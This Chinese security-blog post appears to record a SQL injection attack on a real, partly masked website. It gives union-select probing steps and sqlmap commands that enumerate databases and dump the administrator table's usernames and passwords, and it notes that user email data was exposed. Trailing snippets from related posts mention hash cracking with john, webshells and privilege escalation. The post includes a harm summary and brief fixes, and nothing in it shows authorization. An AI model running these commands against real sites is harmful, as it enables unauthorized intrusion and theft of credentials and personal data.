某网站纯在SQl注入利用漏洞

VSole2021-09-28 08:00:37

1.单引号返回物理路径

2.猜解当前表的列数,16列正确并正常返回,17列返回异常

3.结合union select语句,

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 --+返回3和7,并在图片里面返回12

4.查看其数据库名和数据库版本:

5.使用sqlmap工具

1)爆出其所有库

sqlmap -u "http://******.com/content.php?id=268" –dbs

2)爆出*******2_db库的所有表

sqlmap -u "http://******.com/content.php?id=268" -D *******2_db –tables

3)爆出administrator表的所有列和数据

sqlmap -u "http://******.com/content.php?id=268" -D *******2_db -T administrator --column

sqlmap -u "http://******.com/content.php?id=268" -D *******2_db -T administrator C AddTime,AdminID,AdminName,AdminPassword,ID,isFrozen,LoginTime,UpdateTime -dump

4)再试着爆出enews表的所有列和数据

此表存在2017-2020年用户邮箱数据等敏感信息

另:以上此网站所有表都可使用sqlmap工具得到一些数据信息,在此不一一列举了。

总结:

漏洞可能造成的危害:

1)攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。

2)可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。

3)如果网站目录存在写入权限,可以写入网页木马。攻击者进而可以对网页进行篡改,发布一些违法信息等。

4)经过提权等步骤,服务器最高权限被攻击者获取。攻击者可以远程控制服务器,安装后门,得以修改或控制操作系统。

修复建议:

1)使用waf过滤敏感字段,例如mysql函数。

2)建议提交的url是否存在可控字段,若用户修改参数则自动跳转到某页面。

sql注入sqlmap
本作品采用《CC 协议》,转载必须注明作者和本文链接
01登录框存在sql注入:通过前期的信息搜集,发现站点使用thinkphp3.2版本的框架,在登录页面验证存
发现漏洞七月正值暑假,闲暇时光在百度上inurl一番,找到了一个古老的企业OA系统IP站点,没有域名,扫过一眼,.NET流行时代的普遍漏洞浮现在脑海里——SQL注入在用户名里输入admin’,不负期望地报了错很明显,前后端都没有对用户的输入进行过滤,直接将’带入了SQL语句进行。初步判断,此OA系统存在SQL注入漏洞。漏洞验证打开BurpSuite,设置好浏览器代理,抓下HTTP请求,一气呵成。
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27单引号尝试:存在sql注入sqlmap 走起!跑数据 格式有点问题。获取到管理员加密后的密码$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu使用john 来破解john pwd --wordlist=/usr/share/wordlist/rockyou.txt admin/snoopy 登录后台3x0:后台篇在后台查找一番发现 类似于模板的页面可以利用模板的信息在结合上面的端口信息没有ssh应该是从web端进入 webshell?就接着用了4x0:提权篇查看系统的内核版本启动kali上的apache,把exp上传到服务器把exp下载到靶机解压exp授权脚本使用exp报错不影响使用获取到root权限5x0:flag获得
记一次SQLmap实战
2021-09-28 07:41:13
简介:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目
一些重要的SQLMap命令
2023-05-04 08:55:08
从扫描SQL注入漏洞到获取数据库名字、表和列,以及获得系统访问权限,其可被用于多种目的。我们必须给SQLMap提供有效的cookie才能对登录页面的POST请求进行扫描。不过别总是保持一个较高的值,因为可能会影响结果的准确性。默认情况下值为1,最高可以设置为3。值为3时,就是最大值,包含了一些严重的SQL查询。级别指定要执行的检查或payload的数量。
本靶机难度为高难度,涉及到了缓冲区溢出的源码审计 ,逆向分析,动态调试等漏洞技能点,攻击方法有2种:??SQL 注入得到的密码可以保留。
前段时间参加攻防演练的时候,发现目标系统有很多都使用了用友的产品,故整理一篇关于用友漏洞的文章。
burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
vulnhub之Mercury的实践
2022-11-30 10:31:40
今天实践的是vulnhub的Mercury镜像,下载地址,https://download.vulnhub.
渗透测试很多时候需要的细心和耐心再加上一点运气
VSole
网络安全专家